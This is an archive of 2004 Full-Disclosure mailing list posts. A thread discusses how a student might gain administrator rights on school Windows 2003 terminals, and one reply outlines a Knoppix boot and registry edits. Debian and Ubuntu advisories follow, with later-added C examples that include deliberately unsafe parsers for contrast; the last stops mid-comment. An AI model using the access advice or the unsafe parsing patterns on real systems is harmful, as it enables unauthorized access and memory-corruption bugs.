Date: Thu Oct 28 2004 - 10:54:02 CDT


Op Thursday 28 October 2004 16:39, Andrew Poodle sgreifde:

> Shame really..
>
> I almost laughed at the request.. But was a little surprised to see
> help offered almost immediately

if you were talking about my reply... i just said it was possible.
we all know that if you have local access you can be root/administrator. it's
as simple as that.

i told him it was possible, but does he know now how it's done??? i don't
think so...

i want to see the first person who actually knows now what to do. i will
certainly not give him the entire answer...

--
harry
aka Rik Bobbaers

K.U.Leuven - LUDIT -=- Tel: +32 485 52 71 50
Rik.Bobbaerscc.kuleuven.ac.be -=- http://harry.ulyssis.org

"\x41\x20\x63\x6f\x6d\x70\x75\x74\x65\x72\x20\x77\x69\x74\x68\x6f\x75\x74\x20"
"\x57\x69\x6e\x64\x6f\x77\x73\x20\x69\x73\x20\x6c\x69\x6b\x65\x20\x61\x20\x66"
"\x69\x73\x68\x20\x77\x69\x74\x68\x6f\x75\x74\x20\x61\x20\x62\x69\x63\x79\x63"
"\x6c\x65\x0a\x00"

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html


 
Re: [Full-Disclosure] Re: getting administrator rights on win2003 machine?

From: Robert Allinson (epicroothack.org)
Date: Thu Oct 28 2004 - 10:00:25 CDT


-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

Random Letters wrote:

| Why do you want to get administrative privileges? It can't be for a
| good purpose. You just want to make more work for the people who
| probably work very hard supporting you. You're a parasite.
|
| Grow up, get a life. If you want to be Administrator then buy your
| own PC.
|
| This list is for people who try to prevent break-ins - I'll bet
| that no-one here will help you.
|
|> I'm at a boarding school in Germany and we have a kind of
|> internet terminal there with win2003 running on the computers. My
|> question is: Is there a way of getting administrative privileges
|> ? I used an RPC Exploit before but now the computers are patched.
|> How do I get an administrator account now?? I have physical access
|> to the computers.....
|>
|> Greetings
|>
|> valentin - germany
|
|
Actually, isn't this a FULL-DISCLOSURE list? I would imagine that
security experts and "hackers" alike use this list.

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.2.4 (GNU/Linux)

iD8DBQFBgQmJ1zENm+dj2mQRAs5uAJwJKiMuU+w+9XtNJmqADBbSoFdnGwCfXDAy
ZUfPswhqcVHWDxqp7zAGxaA=
=4dVd
-----END PGP SIGNATURE-----



 
RE: [Full-Disclosure] Re: getting administrator rights on win2003 machine?

From: Todd Towles (toddtowlesbrookshires.com)
Date: Thu Oct 28 2004 - 11:08:15 CDT


A request like that will get you kicked out of other groups. Yet the
request was filled quickly, even without the requester pretending to be a
"Security Professional".

> -----Original Message-----
> From: full-disclosure-adminlists.netsys.com
> [mailto:full-disclosure-adminlists.netsys.com] On Behalf Of
> Andrew Poodle
> Sent: Thursday, October 28, 2004 9:40 AM
> To: full-disclosurelists.netsys.com
> Subject: RE: [Full-Disclosure] Re: getting administrator
> rights on win2003 machine?
>
>
> > -----Original Message-----
> > From: full-disclosure-adminlists.netsys.com
> [mailto:full-disclosure-adminlists.netsys.com] On
> > Behalf Of Random Letters
> > Sent: 28 October 2004 15:17
> > To: full-disclosurelists.netsys.com
> > Subject: [Full-Disclosure] Re: getting administrator rights
> on win2003
> machine?
> >
> > <snip>
> >
> > This list is for people who try to prevent break-ins - I'll bet that
> no-one here will help you.
>
> While I was going to agree with you.. Someone has already
> provided help onlist...
>
> Shame really..
>
> I almost laughed at the request.. But was a little surprised to see
> help offered almost immediately
>
> a
>
> >I'm at a boarding school in Germany and we have a kind of internet
> >terminal there with win2003 running on the computers. My question is:
> >Is there a way of getting administrative privileges? I used an RPC
> >exploit before but now the computers are patched. How do I get an
> >administrator account now?? I have physical access to the
> >computers.....
> >
> >Greetings
> >
> >valentin - germany
>



 
[Full-Disclosure] PuTTY IPv6 0.56 also updated

From: Jeroen Massar (jeroenunfix.org)
Date: Thu Oct 28 2004 - 10:59:27 CDT


In response to the announcement of PuTTY 0.56, I have updated the
PuTTY IPv6 tree to be up-to-date with the 0.56 version.
Precompiled versions can be found, as usual, including the patch at:

http://unfix.org/projects/ipv6/

I've also signed the MD5SUMS included in the archive with my PGP key,
just like this message is signed, thus you can at least verify that the
files are coming from me.

There are also 4 unsigned int mismatch warnings fixed by making a couple
of variables unsigned. From this patch on, defining the /DIPV6 flag when
building will prefix "IPv6" before the "Release" or other fields in the
version file.

Greets,
 Jeroen

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.2.6 (GNU/Linux)
Comment: Jeroen Massar / http://unfix.org/~jeroen/

iD8DBQBBgRdfKaooUjM+fCMRAleCAJ9ZYPvtd+47A2xrf8JXkiFXDOX5IgCgnHG8
zIDe4ivXeeUoPmkdYjiK9Kc=
=bs3R
-----END PGP SIGNATURE-----



 
Re: [Full-Disclosure] Re: getting administrator rights on win2003 machine?

Valdis.Kletnieksvt.edu
Date: Thu Oct 28 2004 - 12:22:41 CDT


On Thu, 28 Oct 2004 16:49:44 +0200, Honza Vlach said:
>
> > use knoppix to boot from, mount the ntfs filesystem, and search the net for
> > which keys in registry you have to change. there may be other files too that
> > you have to change
> > there even are special bootcd's that are made only for the purpose of changing
> > the admin pass etc...
>
> I thought that real blackhats don't teach lamers who can't even do their
> homework properly =^)

The part that nobody's going to tell him:

1) It's *easy* to whomp a server with a Knoppix boot if you have physical access.

2) It's *HARD* to do so without anybody noticing that the server is down and
you're sitting there in front of it, typing away as fast as you can. And even
the most midget-brained user can figure out that if the server is down, and
you're still typing, and you're *not* the sysadmin, you probably have something
to do with why it's down...

:)

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.2.6 (GNU/Linux)
Comment: Exmh version 2.5 07/13/2001

iD8DBQFBgSrhcC3lWbTT17ARAg2DAKDXt+KMmk0f2pl4Ts0YjYaatHiJFACfT+4Z
8Gj158HbZ3Lk12+9htW6bLE=
=l00i
-----END PGP SIGNATURE-----



 
Re: [Full-Disclosure] Re: getting administrator rights on win2003 machine?

From: Mike Nice (nicemanatt.net)
Date: Thu Oct 28 2004 - 12:45:34 CDT


A bit more on topic:
   If your administrator has used syskey level 2 or 3, the suggested
approaches won't work. In addition, if your administrator used the
Encrypting File System, any encrypted files will also be out of your reach,
other than being able to see filenames, dates, encrypted contents, etc.

----- Original Message -----
> |> I'm at a boarding school in Germany and we have a kind of
> |> internet terminal there with win2003 running on the computers. My
> |> question is: Is there a way of getting administrative privileges?
> |> I used an RPC exploit before but now the computers are patched.
> |> How do I get an administrator account now?? I have physical access
> |> to the computers.....



 
[Full-Disclosure] [SECURITY] [DSA 575-1] New catdoc packages fix temporary file vulnerability

debian-security-announcelists.debian.org
Date: Thu Oct 28 2004 - 08:58:47 CDT


-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

- --------------------------------------------------------------------------
Debian Security Advisory DSA 575-1 securitydebian.org
http://www.debian.org/security/ Martin Schulze
October 28th, 2004 http://www.debian.org/security/faq
- --------------------------------------------------------------------------

Package : catdoc
Vulnerability : insecure temporary file
Problem-Type : local
Debian-specific: no
CVE ID : CAN-2003-0193
Debian Bug : 183525

A temporary file problem has been discovered in xlsview from the
catdoc suite, convertors from Word to TeX and plain text, which could
lead to local users being able to overwrite arbitrary files via a
symlink attack on predictable temporary file names.

For the stable distribution (woody) this problem has been fixed in
version 0.91.5-1.woody3.

For the unstable distribution (sid) this problem has been fixed in
version 0.91.5-2.

We recommend that you upgrade your catdoc package.

Upgrade Instructions
- --------------------

wget url
        will fetch the file for you
dpkg -i file.deb
        will install the referenced file.

If you are using the apt-get package manager, use the line for
sources.list as given below:

apt-get update
        will update the internal database
apt-get upgrade
        will install corrected packages

You may use an automated update by adding the resources from the
footer to the proper configuration.

Debian GNU/Linux 3.0 alias woody
- --------------------------------

  Source archives:

    http://security.debian.org/pool/updates/main/c/catdoc/catdoc_0.91.5-1.woody3.dsc
      Size/MD5 checksum: 571 5fbd54b800449adcf10d9498fec33c4c
    http://security.debian.org/pool/updates/main/c/catdoc/catdoc_0.91.5-1.woody3.diff.gz
      Size/MD5 checksum: 14289 652e8c7c13aeb743db5b22ad19b86358
    http://security.debian.org/pool/updates/main/c/catdoc/catdoc_0.91.5.orig.tar.gz
      Size/MD5 checksum: 123460 9d9b32b4d579ea143989533e91bc196c

  Alpha architecture:

    http://security.debian.org/pool/updates/main/c/catdoc/catdoc_0.91.5-1.woody3_alpha.deb
      Size/MD5 checksum: 78750 a95948f97107f79d1ae917128c489729

  Intel IA-32 architecture:

    http://security.debian.org/pool/updates/main/c/catdoc/catdoc_0.91.5-1.woody3_i386.deb
      Size/MD5 checksum: 66898 94f0f2f0bccb8abbed2f70fd70d8d9f1

  Intel IA-64 architecture:

    http://security.debian.org/pool/updates/main/c/catdoc/catdoc_0.91.5-1.woody3_ia64.deb
      Size/MD5 checksum: 83648 7ad9075148ffeda180c904ee680f75e5

  HP Precision architecture:

    http://security.debian.org/pool/updates/main/c/catdoc/catdoc_0.91.5-1.woody3_hppa.deb
      Size/MD5 checksum: 71094 ca3b29e69806dbaf8e452c44fa240785

  Motorola 680x0 architecture:

    http://security.debian.org/pool/updates/main/c/catdoc/catdoc_0.91.5-1.woody3_m68k.deb
      Size/MD5 checksum: 65900 59af477395669716660602080a337d76

  Big endian MIPS architecture:

    http://security.debian.org/pool/updates/main/c/catdoc/catdoc_0.91.5-1.woody3_mips.deb
      Size/MD5 checksum: 73720 116e8e1521724514c9d93226f616ad56

  Little endian MIPS architecture:

    http://security.debian.org/pool/updates/main/c/catdoc/catdoc_0.91.5-1.woody3_mipsel.deb
      Size/MD5 checksum: 73726 6d8e050ad06cee6970fa4771da484b45

  PowerPC architecture:

    http://security.debian.org/pool/updates/main/c/catdoc/catdoc_0.91.5-1.woody3_powerpc.deb
      Size/MD5 checksum: 68090 d9d5e32d398c76497fbc3408b163ed18

  IBM S/390 architecture:

    http://security.debian.org/pool/updates/main/c/catdoc/catdoc_0.91.5-1.woody3_s390.deb
      Size/MD5 checksum: 67120 0834a0f473eaf106576e7b7034e3fe5c

  Sun Sparc architecture:

    http://security.debian.org/pool/updates/main/c/catdoc/catdoc_0.91.5-1.woody3_sparc.deb
      Size/MD5 checksum: 70882 3977e5706886c40c320062b3a4800b7e

  These files will probably be moved into the stable distribution on
  its next update.

- ---------------------------------------------------------------------------------
For apt-get: deb http://security.debian.org/ stable/updates main
For dpkg-ftp: ftp://security.debian.org/debian-security dists/stable/updates/main
Mailing list: debian-security-announcelists.debian.org
Package info: `apt-cache show <pkg>' and http://packages.debian.org/<pkg>

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.2.5 (GNU/Linux)

iD8DBQFBgPsXW5ql+IAeqTIRAnXjAJ9tXLhsgxuNoGEnWcncVNO0g4dbJwCeOTVy
j/uBuBMJ8rinn6Sfj/5gNgM=
=SeNd
-----END PGP SIGNATURE-----



 
Re: [Full-Disclosure] Re: getting administrator rights on win2003 machine?

Valdis.Kletnieksvt.edu
Date: Thu Oct 28 2004 - 15:40:20 CDT


On Thu, 28 Oct 2004 16:29:36 EDT, Kenneth Ng said:
> It gets a bit harder when you have a lot of KVM switches in a big data
> center. It gets even harder when the KVMs are IP accessible
> throughout the firm because the twits who put it in didn't believe in
> IP access lists.

Somehow, I get the feeling that the original poster's site will discover
KVM switches around 2008 or so. ;)

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.2.6 (GNU/Linux)
Comment: Exmh version 2.5 07/13/2001

iD8DBQFBgVkzcC3lWbTT17ARAgHqAKDjmDJaTEE3VJvjDYQ0say3UHVMFgCbB56W
RMSO1yAQAiDD2Q4Qmk1wT+U=
=nfXi
-----END PGP SIGNATURE-----



 
Re: [Full-Disclosure] Re: getting administrator rights on win2003 machine?

From: Kenneth Ng (kenneth.d.nggmail.com)
Date: Thu Oct 28 2004 - 15:29:36 CDT


It gets a bit harder when you have a lot of KVM switches in a big data
center. It gets even harder when the KVMs are IP accessible
throughout the firm because the twits who put it in didn't believe in
IP access lists.

On Thu, 28 Oct 2004 13:22:41 -0400, valdis.kletnieksvt.edu
<valdis.kletnieksvt.edu> wrote:
> On Thu, 28 Oct 2004 16:49:44 +0200, Honza Vlach said:
> >
> > > use knoppix to boot from, mount the ntfs filesystem, and search the net for
> > > which keys in registry you have to change. there may be other files too that
> > > you have to change
> > > there even are special bootcd's that are made only for the purpose of changing
> > > the admin pass etc...
> >
> > I thought that real blackhats don't teach lamers who can't even do their
> > homework properly =^)
>
> The part that nobody's going to tell him:
>
> 1) It's *easy* to whomp a server with a Knoppix boot if you have physical access.
>
> 2) It's *HARD* to do so without anybody noticing that the server is down and
> you're sitting there in front of it, typing away as fast as you can. And even
> the most midget-brained user can figure out that if the server is down, and
> you're still typing, and you're *not* the sysadmin, you probably have something
> to do with why it's down...
>
> :)
>
>
>



 
Re: [Full-Disclosure] Re: getting administrator rights on win2003 machine?

From: darren windham (elcamino74ssgmail.com)
Date: Thu Oct 28 2004 - 16:37:28 CDT


If you can't find the tool on your own that can reset the local admin
account you need help. I carry it in floppy and cd form with me
in case I ever have a server I'm working on that no one knows the
passwords to.

Learn to use search engines before you start making yourself look silly.

On Thu, 28 Oct 2004 16:29:36 -0400, Kenneth Ng <kenneth.d.nggmail.com> wrote:
> It gets a bit harder when you have a lot of KVM switches in a big data
> center. It gets even harder when the KVMs are IP accessible
> throughout the firm because the twits who put it in didn't believe in
> IP access lists.
>
> On Thu, 28 Oct 2004 13:22:41 -0400, valdis.kletnieksvt.edu
>
>
> <valdis.kletnieksvt.edu> wrote:
> > On Thu, 28 Oct 2004 16:49:44 +0200, Honza Vlach said:
> > >
> > > > use knoppix to boot from, mount the ntfs filesystem, and search the net for
> > > > which keys in registry you have to change. there may be other files too that
> > > > you have to change
> > > > there even are special bootcd's that are made only for the purpose of changing
> > > > the admin pass etc...
> > >
> > > I thought that real blackhats don't teach lamers who can't even do their
> > > homework properly =^)
> >
> > The part that nobody's going to tell him:
> >
> > 1) It's *easy* to whomp a server with a Knoppix boot if you have physical access.
> >
> > 2) It's *HARD* to do so without anybody noticing that the server is down and
> > you're sitting there in front of it, typing away as fast as you can. And even
> > the most midget-brained user can figure out that if the server is down, and
> > you're still typing, and you're *not* the sysadmin, you probably have something
> > to do with why it's down...
> >
> > :)
> >
> >
> >
>



 
Re: [Full-Disclosure] Re: getting administrator rights on win2003 machine?

From: Anders Langworthy (hadespsilanthropy.org)
Date: Thu Oct 28 2004 - 17:40:07 CDT


> Somehow, I get the feeling that the original poster's site will discover
> KVM switches around 2008 or so. ;)

That's exactly my point. I don't necessarily approve of this list being
used to help clueless script kiddies r00t systems, but the information
needed to accomplish that feat is *identical* to the information
needed by clueless sysadmins to prevent it.

What if I had been the original poster, and had phrased my question from
the standpoint of a system administrator requesting help in hardening a
Windows 2003 server that has to be physically accessible? Would you
have "seen through my ploy" and not helped me?

This list is about helping people who are interested in computer
security get *better* at computer security. I don't see how we can
maintain that double standard without causing more harm than good.



 
[Full-Disclosure] [USN-8-1] gaim vulnerabilities

From: Martin Pitt (martin.pittcanonical.com)
Date: Tue Oct 26 2004 - 19:53:22 CDT


===========================================================
Ubuntu Security Notice USN-8-1 October 27, 2004
gaim vulnerabilities
CAN-2004-0891
===========================================================

A security issue affects the following Ubuntu releases:

Ubuntu 4.10 (Warty Warthog)

The following packages are affected:

gaim

The problem can be corrected by upgrading the affected package to
version 1:1.0.0-1ubuntu1.1. In general, a standard system upgrade is
sufficient to effect the necessary changes.

Details follow:

A buffer overflow and two remote crashes were recently discovered in
gaim's MSN protocol handler. An attacker could potentially execute
arbitrary code with the user's privileges by crafting and sending a
particular MSN message.

  Source archives:

    http://security.ubuntu.com/ubuntu/pool/main/g/gaim/gaim_1.0.0-1ubuntu1.1.diff.gz
      Size/MD5: 40716 a1cd244a1d9197c9a4855706f857ede2
    http://security.ubuntu.com/ubuntu/pool/main/g/gaim/gaim_1.0.0-1ubuntu1.1.dsc
      Size/MD5: 853 dbd5a82e0fa2c33df8fc26d636a2f9f1
    http://security.ubuntu.com/ubuntu/pool/main/g/gaim/gaim_1.0.0.orig.tar.gz
      Size/MD5: 6985979 7dde686aace751a49dce734fd0cb7ace

  amd64 architecture (Athlon64, Opteron, EM64T Xeon)

    http://security.ubuntu.com/ubuntu/pool/main/g/gaim/gaim_1.0.0-1ubuntu1.1_amd64.deb
      Size/MD5: 3443672 0a2a22b071c0256a2d68d20b474fdddc

  i386 architecture (x86 compatible Intel/AMD)

    http://security.ubuntu.com/ubuntu/pool/main/g/gaim/gaim_1.0.0-1ubuntu1.1_i386.deb
      Size/MD5: 3353616 1b825ce8a2cbba5fa2171fa089f71112

  powerpc architecture (Apple Macintosh G3/G4/G5)

    http://security.ubuntu.com/ubuntu/pool/main/g/gaim/gaim_1.0.0-1ubuntu1.1_powerpc.deb
      Size/MD5: 3417684 bae36e86bcf49722af6497d55a2de5fc


-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.2.4 (GNU/Linux)

iD8DBQFBfvGCDecnbV4Fd/IRAr3eAJ9EkWwjOmcrhPFDxRCO+iB6Jj8sLQCgsQsa
xOYdKjDCqSd1EO9f+IfaT8Y=
=Bf36
-----END PGP SIGNATURE-----
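The following C code is an added illustration of the buffer overflow class the notice describes; it is not gaim's code, and the line format "MSG <user> <length>\r\n" together with the field sizes is a constructed stand-in, not the real MSN command syntax. It places an unbounded sscanf("%s") copy into a fixed stack buffer beside a parser that bounds every field, checks the numeric field for wrap-around and a size cap, and leaves its output untouched on failure.

```c
/* Added illustration for USN-8-1, not gaim's code. The line format
 * "MSG <user> <length>\r\n" is a constructed stand-in for the real MSN
 * command syntax; the field sizes are assumptions for the demo. */
#include <limits.h>
#include <stdio.h>
#include <string.h>

#define NAME_MAX_LEN 16     /* assumed field size, NUL included */
#define MAX_BODY     65536  /* assumed cap on a declared body length */

struct msg_hdr {
    char user[NAME_MAX_LEN];
    unsigned long body_len;
};

/* Defective pattern: "%s" carries no width, so a sender name longer than
 * 15 bytes runs off the end of user[] and onto whatever follows it on the
 * stack. Kept only for contrast; never fed untrusted input here. */
int parse_hdr_unsafe(const char *line, struct msg_hdr *out)
{
    return sscanf(line, "MSG %s %lu", out->user, &out->body_len) == 2 ? 0 : -1;
}

/* Hardened parser: every copy is bounded by its destination, the numeric
 * field is rejected on wrap-around or when it exceeds MAX_BODY, the line
 * must end in CRLF, and *out is left untouched on failure so partial
 * data can never be acted on. Returns 0 on success, -1 otherwise. */
int parse_hdr_safe(const char *line, size_t line_len, struct msg_hdr *out)
{
    const char *p, *end, *sp, *q;
    size_t ulen;
    unsigned long len = 0;

    if (line_len < 4 || memcmp(line, "MSG ", 4) != 0)
        return -1;
    p = line + 4;
    end = line + line_len;
    sp = memchr(p, ' ', (size_t)(end - p));
    if (sp == NULL)
        return -1;
    ulen = (size_t)(sp - p);
    if (ulen == 0 || ulen >= NAME_MAX_LEN)    /* must leave room for NUL */
        return -1;

    q = sp + 1;
    if (q == end || *q < '0' || *q > '9')
        return -1;
    for (; q < end && *q >= '0' && *q <= '9'; q++) {
        unsigned digit = (unsigned)(*q - '0');
        if (len > (ULONG_MAX - digit) / 10)       /* would wrap */
            return -1;
        len = len * 10 + digit;
    }
    if (len > MAX_BODY || end - q != 2 || q[0] != '\r' || q[1] != '\n')
        return -1;

    memcpy(out->user, p, ulen);
    out->user[ulen] = '\0';
    out->body_len = len;
    return 0;
}

/* Self-check helpers: 1 if line parses to exactly these fields / is rejected. */
int parses_as(const char *line, const char *user, unsigned long body_len)
{
    struct msg_hdr h;
    return parse_hdr_safe(line, strlen(line), &h) == 0 &&
           strcmp(h.user, user) == 0 && h.body_len == body_len;
}

int rejects(const char *line)
{
    struct msg_hdr h;
    return parse_hdr_safe(line, strlen(line), &h) == -1;
}

int main(void)
{
    printf("good line accepted: %d\n", parses_as("MSG alice 42\r\n", "alice", 42));
    printf("oversized name rejected: %d\n",
           rejects("MSG aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa 1\r\n"));
    printf("wrapping length rejected: %d\n",
           rejects("MSG bob 99999999999999999999999\r\n"));
    return 0;
}
```

The rejection cases worth keeping in a regression suite are the ones a crafted message would use: an over-long name, a numeric field that wraps the accumulator, a declared body larger than the handler will ever allocate, and a missing terminator.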



 
[Full-Disclosure] Heh...30 minutes of SSH login attempts...not the standard root and user attempts either

From: James Lay (jlayameriben.com)
Date: Thu Oct 28 2004 - 20:52:37 CDT


Here it is....what an ass.....from Korea..doesn't surprise me ;)

http://www.slave-tothe-box.net/public/pubnet.txt

James Lay
Network Manager/Security Officer
AmeriBen Solutions/IEC Group
Semper Vigilans!!!



 
[Full-Disclosure] [SECURITY] [DSA 576-1] New Squid packages fix several vulnerabilities

debian-security-announcelists.debian.org
Date: Fri Oct 29 2004 - 00:41:12 CDT


-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

- --------------------------------------------------------------------------
Debian Security Advisory DSA 576-1 securitydebian.org
http://www.debian.org/security/ Martin Schulze
October 29th, 2004 http://www.debian.org/security/faq
- --------------------------------------------------------------------------

Package : squid
Vulnerability : several
Problem-Type : remote
Debian-specific: no
CVE ID : CVE-1999-0710 CAN-2004-0918
Debian Bug : 133131

Several security vulnerabilities have been discovered in Squid, the
internet object cache, the popular WWW proxy cache. The Common
Vulnerabilities and Exposures project identifies the following
problems:

CVE-1999-0710

    It is possible to bypass access lists and scan arbitrary hosts and
    ports in the network through cachemgr.cgi, which is installed by
    default. This update disables this feature and introduces a
    configuration file (/etc/squid/cachemgr.conf) to control
    this behaviour.

CAN-2004-0918

    The asn_parse_header function (asn1.c) in the SNMP module for
    Squid allows remote attackers to cause a denial of service via
    certain SNMP packets with negative length fields that cause a
    memory allocation error.

For the stable distribution (woody) these problems have been fixed in
version 2.4.6-2woody4.

For the unstable distribution (sid) these problems have been fixed in
version 2.5.7-1.

We recommend that you upgrade your squid package.

Upgrade Instructions
- --------------------

wget url
        will fetch the file for you
dpkg -i file.deb
        will install the referenced file.

If you are using the apt-get package manager, use the line for
sources.list as given below:

apt-get update
        will update the internal database
apt-get upgrade
        will install corrected packages

You may use an automated update by adding the resources from the
footer to the proper configuration.

Debian GNU/Linux 3.0 alias woody
- --------------------------------

  Source archives:

    http://security.debian.org/pool/updates/main/s/squid/squid_2.4.6-2woody4.dsc
      Size/MD5 checksum: 612 ecf99211ec91dfb34bd6089ec9ae1b53
    http://security.debian.org/pool/updates/main/s/squid/squid_2.4.6-2woody4.diff.gz
      Size/MD5 checksum: 226359 4e6ade338491ef8569035c4aecc855ef
    http://security.debian.org/pool/updates/main/s/squid/squid_2.4.6.orig.tar.gz
      Size/MD5 checksum: 1081920 59ce2c58da189626d77e27b9702ca228

  Alpha architecture:

    http://security.debian.org/pool/updates/main/s/squid/squid_2.4.6-2woody4_alpha.deb
      Size/MD5 checksum: 814832 cca13d30e0f1f8910a07fa5ab70c861e
    http://security.debian.org/pool/updates/main/s/squid/squid-cgi_2.4.6-2woody4_alpha.deb
      Size/MD5 checksum: 75250 421fd4ee596d4c9993ba5f8778eaef2f
    http://security.debian.org/pool/updates/main/s/squid/squidclient_2.4.6-2woody4_alpha.deb
      Size/MD5 checksum: 59996 62c1544bce8c872e6c1b3fdce5e94475

  ARM architecture:

    http://security.debian.org/pool/updates/main/s/squid/squid_2.4.6-2woody4_arm.deb
      Size/MD5 checksum: 724816 e2076225318e14b3c8bff10a40cdf7f9
    http://security.debian.org/pool/updates/main/s/squid/squid-cgi_2.4.6-2woody4_arm.deb
      Size/MD5 checksum: 73026 4bc2cc0d5d0d29992ffd1b9a82653e21
    http://security.debian.org/pool/updates/main/s/squid/squidclient_2.4.6-2woody4_arm.deb
      Size/MD5 checksum: 58332 408e227f29d0aa923044beedc3e7c92e

  Intel IA-32 architecture:

    http://security.debian.org/pool/updates/main/s/squid/squid_2.4.6-2woody4_i386.deb
      Size/MD5 checksum: 684008 0a09e40e20659cebdbab638f1cbc009b
    http://security.debian.org/pool/updates/main/s/squid/squid-cgi_2.4.6-2woody4_i386.deb
      Size/MD5 checksum: 72762 9e32b4f77446d9172b381f52f18a11eb
    http://security.debian.org/pool/updates/main/s/squid/squidclient_2.4.6-2woody4_i386.deb
      Size/MD5 checksum: 57912 5b8e0c713676845dc5a7263a44dd56cd

  Intel IA-64 architecture:

    http://security.debian.org/pool/updates/main/s/squid/squid_2.4.6-2woody4_ia64.deb
      Size/MD5 checksum: 952836 db5e0a6fc0863bdebbf579f957121da6
    http://security.debian.org/pool/updates/main/s/squid/squid-cgi_2.4.6-2woody4_ia64.deb
      Size/MD5 checksum: 79144 7b9eb001137d25be30d9b8400d6aee39
    http://security.debian.org/pool/updates/main/s/squid/squidclient_2.4.6-2woody4_ia64.deb
      Size/MD5 checksum: 62682 af3f6bdb3de9bdae20896f630eeb4b60

  HP Precision architecture:

    http://security.debian.org/pool/updates/main/s/squid/squid_2.4.6-2woody4_hppa.deb
      Size/MD5 checksum: 778974 59f67088877baa7baf90e60a4f3317a6
    http://security.debian.org/pool/updates/main/s/squid/squid-cgi_2.4.6-2woody4_hppa.deb
      Size/MD5 checksum: 74462 118f494f5079eda3ba1b52d1462f4012
    http://security.debian.org/pool/updates/main/s/squid/squidclient_2.4.6-2woody4_hppa.deb
      Size/MD5 checksum: 59482 cbef83fb6fbb50ad47d318a821dc7358

  Motorola 680x0 architecture:

    http://security.debian.org/pool/updates/main/s/squid/squid_2.4.6-2woody4_m68k.deb
      Size/MD5 checksum: 665202 51cc52fe2a265c63cbaed727fad15a99
    http://security.debian.org/pool/updates/main/s/squid/squid-cgi_2.4.6-2woody4_m68k.deb
      Size/MD5 checksum: 72378 07708d039b0cf46ee7c6628ad7e4bcbf
    http://security.debian.org/pool/updates/main/s/squid/squidclient_2.4.6-2woody4_m68k.deb
      Size/MD5 checksum: 57584 5102473e069bac195482ed6385def788

  Big endian MIPS architecture:

    http://security.debian.org/pool/updates/main/s/squid/squid_2.4.6-2woody4_mips.deb
      Size/MD5 checksum: 764682 62488f6104b371b6107b39b6b4bcaeda
    http://security.debian.org/pool/updates/main/s/squid/squid-cgi_2.4.6-2woody4_mips.deb
      Size/MD5 checksum: 73928 14f1391ec0888964efebe1ba7a11f220
    http://security.debian.org/pool/updates/main/s/squid/squidclient_2.4.6-2woody4_mips.deb
      Size/MD5 checksum: 58636 0123e6dba5c165033e3ce6dd60c8d89a

  Little endian MIPS architecture:

    http://security.debian.org/pool/updates/main/s/squid/squid_2.4.6-2woody4_mipsel.deb
      Size/MD5 checksum: 764144 8cb8b84931df0d8b271e5c2f8a010fb2
    http://security.debian.org/pool/updates/main/s/squid/squid-cgi_2.4.6-2woody4_mipsel.deb
      Size/MD5 checksum: 74030 ee3349da5a1634891ed67136c9989fc6
    http://security.debian.org/pool/updates/main/s/squid/squidclient_2.4.6-2woody4_mipsel.deb
      Size/MD5 checksum: 58736 75c8d8c7d15b149f3c0a1bdccae59df8

  PowerPC architecture:

    http://security.debian.org/pool/updates/main/s/squid/squid_2.4.6-2woody4_powerpc.deb
      Size/MD5 checksum: 721856 283001554d7096f5ddc4126231ef6807
    http://security.debian.org/pool/updates/main/s/squid/squid-cgi_2.4.6-2woody4_powerpc.deb
      Size/MD5 checksum: 73014 4a6e19209a8dd04cdc74e474abeb16e5
    http://security.debian.org/pool/updates/main/s/squid/squidclient_2.4.6-2woody4_powerpc.deb
      Size/MD5 checksum: 58220 7424479351cd71563de79769b90911d1

  IBM S/390 architecture:

    http://security.debian.org/pool/updates/main/s/squid/squid_2.4.6-2woody4_s390.deb
      Size/MD5 checksum: 711276 8cab4b4e4a1f89b36aac29fc59613c91
    http://security.debian.org/pool/updates/main/s/squid/squid-cgi_2.4.6-2woody4_s390.deb
      Size/MD5 checksum: 73348 d677789f48da35c39467674bc165065a
    http://security.debian.org/pool/updates/main/s/squid/squidclient_2.4.6-2woody4_s390.deb
      Size/MD5 checksum: 58784 f8d217932f607b381a17b5f798e3352a

  Sun Sparc architecture:

    http://security.debian.org/pool/updates/main/s/squid/squid_2.4.6-2woody4_sparc.deb
      Size/MD5 checksum: 723958 41dce5c7e630c0b0ecedbed8acba2e7a
    http://security.debian.org/pool/updates/main/s/squid/squid-cgi_2.4.6-2woody4_sparc.deb
      Size/MD5 checksum: 75644 f4af52384e6190450d5fc46ca3b66a82
    http://security.debian.org/pool/updates/main/s/squid/squidclient_2.4.6-2woody4_sparc.deb
      Size/MD5 checksum: 60660 3a44a74fe3bcf2dd714f308cd4708a89

  These files will probably be moved into the stable distribution on
  its next update.

- ---------------------------------------------------------------------------------
For apt-get: deb http://security.debian.org/ stable/updates main
For dpkg-ftp: ftp://security.debian.org/debian-security dists/stable/updates/main
Mailing list: debian-security-announcelists.debian.org
Package info: `apt-cache show <pkg>' and http://packages.debian.org/<pkg>

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.2.5 (GNU/Linux)

iD8DBQFBgdf3W5ql+IAeqTIRAuoiAKCPBpTgkA8EZSrCteAxeghkLpqFCACeL8iz
jy5uf0Bj98dyYZgxALs00PE=
=ygMY
-----END PGP SIGNATURE-----
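The following C code is an added illustration for the CAN-2004-0918 entry above, not Squid's asn1.c: a BER length decoder that accumulates into a signed int (the pattern under which a crafted length field turns negative and is then handed to an allocation), beside a bounds-checked decoder that rejects the indefinite form, more length octets than size_t can hold, and any length exceeding the bytes left in the packet. The byte sequences are constructed vectors, not captured SNMP traffic.

```c
/* Added illustration for CAN-2004-0918, not Squid's asn1.c. The byte
 * sequences at the bottom are constructed test vectors (length octets
 * only, tag already consumed), not captured SNMP traffic. */
#include <limits.h>
#include <stddef.h>
#include <stdio.h>

/* Defective pattern: long-form length octets accumulated into an int and
 * handed back as-is. Octets 84 80 00 00 10 decode to 0x80000010, which an
 * int reads as INT_MIN + 16; a caller that then does malloc(len + 1) or
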